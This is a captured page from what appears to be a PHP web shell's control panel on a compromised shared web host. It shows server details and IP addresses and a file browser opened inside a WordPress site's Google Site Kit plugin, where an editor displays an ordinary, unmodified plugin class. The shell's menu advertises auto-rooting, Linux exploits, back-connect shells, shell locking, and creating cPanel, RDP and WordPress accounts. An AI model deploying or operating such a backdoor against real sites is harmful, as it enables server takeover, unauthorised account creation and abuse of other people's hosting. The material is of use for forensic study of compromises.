Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.118.154.250
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
Advanced_Tracking /
[ HOME SHELL ]
Name
Size
Permission
Action
AMP_Config_Injector.php
1.82
KB
-rw-r--r--
Event.php
2.86
KB
-rw-r--r--
Event_List.php
1.47
KB
-rw-r--r--
Event_List_Registry.php
1.11
KB
-rw-r--r--
Script_Injector.php
1.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AMP_Config_Injector.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\Advanced_Tracking\AMP_Config_Injector * * @package Google\Site_Kit\Modules\Analytics_4 * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4\Advanced_Tracking; /** * Class for injecting JavaScript based on the registered event configurations. * * @since 1.18.0. * @access private * @ignore */ final class AMP_Config_Injector { /** * Creates list of measurement event configurations and javascript to inject. * * @since 1.18.0. * @since 1.121.0 Migrated from the Analytics (UA) namespace. * * @param array $gtag_amp_opt gtag config options for AMP. * @param array $events The map of Event objects, keyed by their unique ID. * @return array Filtered $gtag_amp_opt. */ public function inject_event_configurations( $gtag_amp_opt, $events ) { if ( empty( $events ) ) { return $gtag_amp_opt; } if ( ! array_key_exists( 'triggers', $gtag_amp_opt ) ) { $gtag_amp_opt['triggers'] = array(); } foreach ( $events as $amp_trigger_key => $event ) { $event_config = $event->get_config(); $amp_trigger = array(); if ( 'DOMContentLoaded' === $event_config['on'] ) { $amp_trigger['on'] = 'visible'; } else { $amp_trigger['on'] = $event_config['on']; $amp_trigger['selector'] = $event_config['selector']; } $amp_trigger['vars'] = array(); $amp_trigger['vars']['event_name'] = $event_config['action']; if ( is_array( $event_config['metadata'] ) ) { foreach ( $event_config['metadata'] as $key => $value ) { $amp_trigger['vars'][ $key ] = $value; } } $gtag_amp_opt['triggers'][ $amp_trigger_key ] = $amp_trigger; } return $gtag_amp_opt; } }
Close